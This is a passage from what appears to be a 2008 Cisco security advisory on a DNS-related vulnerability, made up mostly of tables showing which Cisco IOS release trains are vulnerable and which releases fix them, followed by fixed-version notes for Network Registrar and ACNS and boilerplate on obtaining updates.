|\r\n|------------+-------------+-------------|\r\n| 12.1XZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Note: | |\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.1(5)YE1 | |\r\n| | are | 12.4(19a) |\r\n| 12.1YE | vulnerable, | |\r\n| | release | 12.4(19b) |\r\n| | 12.1(5)YE1 | |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.1YF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.1YJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.2-Based | Release | Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2 | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2B | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2BC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2BW | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.2(8)BY | |\r\n| | are | |\r\n| | vulnerable, | 12.4(19a) |\r\n| 12.2BY | release | |\r\n| | 12.2(8)BY | 12.4(19b) |\r\n| | and later | |\r\n| | are not | |\r\n| | vulnerable; | |\r\n| | first fixed | |\r\n| | in 12.4 | |\r\n|------------+-------------+-------------|\r\n| 12.2BZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2CX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2CY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2CZ | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.2DA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2DD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2DX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EWA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2EZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2FX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2FY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2FZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2IXF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2JA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2JK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2MB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2MC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2S | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SBC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SCA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SED | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SEG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SGA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SM | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SO | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SRA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SRB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SRC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SVA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SVC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SVD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SXI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2SZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2T | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.2(8) | |\r\n| | TPC10d are | |\r\n| | vulnerable, | |\r\n| 12.2TPC | release | |\r\n| | 12.2(8) | |\r\n| | TPC10d and | |\r\n| | later are | |\r\n| | not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.2UZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XB | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XC | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2XD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XG | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2XH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XI | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XK | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XL | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2XM | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XN | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XNA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XO | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XR | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XS | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XT | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2XU | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2XV | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2XW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YD | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YE | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YH | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YJ | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2YK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YL | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YM | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YN | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.2(18) |\r\n| | migrate to | SXF15; |\r\n| 12.2YO | any release | Available |\r\n| | in 12.2SY | on |\r\n| | | 08-AUG-08 |\r\n|------------+-------------+-------------|\r\n| 12.2YP | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YR | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YS | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YT | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YU | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2YV | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2YW | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2YZ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2ZA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2ZB | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.2ZC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2ZD | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2ZE | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2ZF | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.2ZG | first fixed | |\r\n| | in 12.4T | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.2ZH | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.2ZJ | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.2ZL | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.2ZP | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2ZU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2ZY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.2ZYA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.3-Based | Release | Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3 | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3B | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3BC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3BW | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3EU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JEA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JEB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JEC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JL | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.3JX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3T | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3TPC | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.3VA | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XA | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XB | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XC | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XD | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XE | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XF | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XG | first fixed | |\r\n| | in 12.4T | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XH | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3XI | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| | | 12.3(14) |\r\n| | | YX12 |\r\n| | Vulnerable; | |\r\n| 12.3XJ | first fixed | 12.4(20)T; |\r\n| | in 12.3YX | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XK | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XQ | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3XR | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(19a) |\r\n| 12.3XS | first fixed | |\r\n| | in 12.4 | 12.4(19b) |\r\n|------------+-------------+-------------|\r\n| 12.3XU | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | | 12.3(14) |\r\n| | | YX12 |\r\n| | Vulnerable; | |\r\n| 12.3XW | first fixed | 12.4(20)T; |\r\n| | in 12.3YX | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.3XY | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | | 12.4(19a) |\r\n| | | |\r\n| | Vulnerable; | 12.4(19b) |\r\n| 12.3YA | first fixed | |\r\n| | in 12.4 | 12.4(20)T; |\r\n| | | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YD | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | | 12.3(14) |\r\n| | | YX12 |\r\n| | Vulnerable; | |\r\n| 12.3YF | first fixed | 12.4(20)T; |\r\n| | in 12.3YX | Available |\r\n| | | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YG | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YH | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YI | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.3YJ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YK | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Releases | |\r\n| | prior to | |\r\n| | 12.3(14) | |\r\n| | YM12 are | |\r\n| | vulnerable, | 12.3(14) |\r\n| 12.3YM | release | YM12 |\r\n| | 12.3(14) | |\r\n| | YM12 and | |\r\n| | later are | |\r\n| | not | |\r\n| | vulnerable; | |\r\n|------------+-------------+-------------|\r\n| 12.3YQ | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YS | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.3YT | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | |\r\n| 12.3YU | first fixed | |\r\n| | in 12.4XB | |\r\n|------------+-------------+-------------|\r\n| 12.3YX | 12.3(14) | 12.3(14) |\r\n| | YX12 | YX12 |\r\n|------------+-------------+-------------|\r\n| 12.3YZ | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| Affected | First Fixed | Recommended |\r\n| 12.4-Based | Release | Release |\r\n| Releases | | |\r\n|------------+-------------+-------------|\r\n| | 12.4(18b) | |\r\n| | | |\r\n| | 12.4(19a) | 12.4(19a) |\r\n| 12.4 | | |\r\n| | 12.4(19b) | 12.4(19b) |\r\n| | | |\r\n| | 12.4(21) | |\r\n|------------+-------------+-------------|\r\n| 12.4JA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JMA | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JMB | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JMC | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4JX | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4MD | 12.4(15)MD | 12.4(15)MD |\r\n|------------+-------------+-------------|\r\n| 12.4MR | 12.4(19)MR | 12.4(19)MR |\r\n|------------+-------------+-------------|\r\n| 12.4SW | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| | 12.4(15)T6 | |\r\n| | | 12.4(20)T; |\r\n| 12.4T | 12.4(20)T; | Available |\r\n| | Available | on |\r\n| | on | 11-JUL-08 |\r\n| | 11-JUL-08 | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.4XA | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.4XB | 12.4(2)XB10 | |\r\n|------------+-------------+-------------|\r\n| 12.4XC | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| | 12.4(4) | 12.4(20)T; |\r\n| | XD11; | Available |\r\n| 12.4XD | Available | on |\r\n| | on | 11-JUL-08 |\r\n| | 31-JUL-08 | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.4XE | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.4XF | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4XG | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.4XJ | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n|------------+-------------+-------------|\r\n| 12.4XK | Not | |\r\n| | Vulnerable | |\r\n|------------+-------------+-------------|\r\n| 12.4XL | 12.4(15)XL2 | 12.4(15)XL2 |\r\n|------------+-------------+-------------|\r\n| 12.4XM | 12.4(15)XM1 | 12.4(15)XM1 |\r\n|------------+-------------+-------------|\r\n| 12.4XN | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.4XQ | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.4XT | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.4XV | Vulnerable; | |\r\n| | contact TAC | |\r\n|------------+-------------+-------------|\r\n| 12.4XW | 12.4(11)XW8 | 12.4(11)XW6 |\r\n|------------+-------------+-------------|\r\n| 12.4XY | 12.4(15)XY3 | |\r\n|------------+-------------+-------------|\r\n| | Vulnerable; | 12.4(20)T; |\r\n| 12.4XZ | first fixed | Available |\r\n| | in 12.4T | on |\r\n| | | 11-JUL-08 |\r\n+----------------------------------------+\r\n\r\nCisco Network Registrar\r\n+----------------------\r\n\r\n+---------------------------------------+\r\n| Affected | |\r\n| Release | First Fixed Release |\r\n| Train | |\r\n|--------------+------------------------|\r\n| 6.1.x | Contact TAC |\r\n|--------------+------------------------|\r\n| | 6.3.1.1 patch; |\r\n| 6.3.x | available mid-July |\r\n| | 2008 |\r\n|--------------+------------------------|\r\n| 7.0.x | 7.0.1; available in |\r\n| | mid-July 2008 |\r\n+---------------------------------------+\r\n\r\nCisco Network Registrar software is available for download at:\r\n\r\nhttp://www.cisco.com/pcgi-bin/Software/Tablebuild/tablebuild.pl/nr-eval\r\n\r\nCisco Application and Content Networking System\r\n+----------------------------------------------\r\n\r\nThis issue is fixed in version 5.5.11 of Cisco ACNS software. This\r\nrelease will be available for download from www.cisco.com in late July\r\n2008.\r\n\r\nCisco ACNS 5.5 software is available for download at:\r\n\r\nhttp://www.cisco.com/pcgi-bin/tablebuild.pl/acns55\r\n\r\nWorkarounds\r\n===========\r\n\r\nThere are no workarounds.\r\n\r\nAdditional information about identification and mitigation of attacks\r\nagainst DNS is in the Cisco Applied Intelligence white paper "DNS Best\r\nPractices, Network Protections, and Attack Identification," available at\r\nhttp://www.cisco.com/web/about/security/intelligence/dns-bcp.html.\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco has released free software updates that address these\r\nvulnerabilities. Prior to deploying software, customers should consult\r\ntheir maintenance provider or check the software for feature set\r\ncompatibility and known issues specific to their environment.\r\n\r\nCustomers may only install and expect support for the feature sets\r\nthey have purchased. By installing, downloading, accessing or\r\notherwise using such software upgrades, customers agree to be bound\r\nby the terms of Cisco's software license terms found at\r\nhttp://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,\r\nor as otherwise set forth at Cisco.com Downloads at\r\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml.\r\n\r\nDo not contact psirt@cisco.com or security-alert@cisco.com for software\r\nupgrades.\r\n\r\nCustomers with Service Contracts\r\n+-------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, this means that upgrades\r\nshould be obtained through the Software Center on Cisco's 